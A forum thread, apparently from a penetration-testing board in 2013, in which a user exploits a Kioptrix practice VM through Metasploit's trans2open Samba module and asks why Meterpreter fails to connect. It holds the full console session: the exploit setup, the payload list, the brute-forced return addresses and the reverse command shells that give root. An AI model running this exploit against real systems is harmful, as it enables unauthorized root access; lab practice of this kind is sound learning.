so i created a vm and put kioptrix
ran metasploit and used the samba exploit (exploit/linux/samba/trans2open)
it was successfull
then tried to use meterpreter however it would not connect
i was able to get the shell session but not meterpreter
no errors, it just keeps on trying
anyone had simular issues?
root-boy
2013-05-20, 08:06
Can you show us a trace of what you did exactly and the output so we can have a better idea on your problem.
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf exploit(trans2open) > show options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.108 yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
msf exploit(trans2open) >
msf exploit(trans2open) > sessions
Active sessions
===============
No active sessions.
msf exploit(trans2open) > exploit
Started reverse handler on 192.168.1.140:4444
Trying return address 0xbffffdfc...
Trying return address 0xbffffcfc...
Trying return address 0xbffffbfc...
Trying return address 0xbffffafc...
Trying return address 0xbffff9fc...
Command shell session 1 opened (192.168.1.140:4444 -> 192.168.1.108:32769) at 2013-05-20 10:34:05 -0400
Command shell session 2 opened (192.168.1.140:4444 -> 192.168.1.108:32770) at 2013-05-20 10:34:06 -0400
exit
192.168.1.108 - Command shell session 2 closed. Reason: Died from EOFError
msf exploit(trans2open) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
linux/x86/adduser normal Linux Add User
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
linux/x86/meterpreter/bind_nonx_tcp normal Linux Meterpreter, Bind TCP Stager
linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_nonx_tcp normal Linux Meterpreter, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
linux/x86/read_file normal Linux Read File
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
linux/x86/shell/bind_nonx_tcp normal Linux Command Shell, Bind TCP Stager
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_nonx_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm Demo
msf exploit(trans2open) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf exploit(trans2open) > show options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.108 yes The target address
RPORT 139 yes The target port
Payload options (linux/x86/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DebugOptions 0 no Debugging options for POSIX meterpreter
LPORT 4444 yes The listen port
PrependFork no Add a fork() / exit_group() (for parent) code
RHOST 192.168.1.108 no The target address
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
now when i run exploit i get the following...it keeps on going with trying to find a return address
msf exploit(trans2open) > exploit
Started bind handler
Trying return address 0xbffffdfc...
Trying return address 0xbffffcfc...
Trying return address 0xbffffbfc...
Trying return address 0xbffffafc...
Transmitting intermediate stager for over-sized stage...(100 bytes)
Trying return address 0xbffff9fc...
Sending stage (1126400 bytes) to 192.168.1.108
Trying return address 0xbffff8fc...
Trying return address 0xbffff7fc...
Trying return address 0xbffff6fc...
Trying return address 0xbffff5fc...
Trying return address 0xbffff4fc...
Trying return address 0xbffff3fc...
Trying return address 0xbffff2fc...
Trying return address 0xbffff1fc...
Trying return address 0xbffff0fc...
Trying return address 0xbfffeffc...
Trying return address 0xbfffeefc...
Trying return address 0xbfffedfc...
Trying return address 0xbfffecfc...
Trying return address 0xbfffebfc...
Trying return address 0xbfffeafc...
Trying return address 0xbfffe9fc...
Trying return address 0xbfffe8fc...
Trying return address 0xbfffe7fc...
Trying return address 0xbfffe6fc...
i even tried the Payload options (linux/x86/meterpreter/reverse_tcp):
and set the LHOST to my machine but i get the same thing
i'm able to get a shell and i'm fully logged in to the system as root but i can't get meterpreter to work.
root-boy
2013-05-23, 08:42
Looks like the shellcode is somehow broken, try to play with the encoders to use at run-time. Not sure if this will solve the problem.
i'm not sure i understand...what do you mean the shellcode is broken? do you mean the payload?
thanks
Nix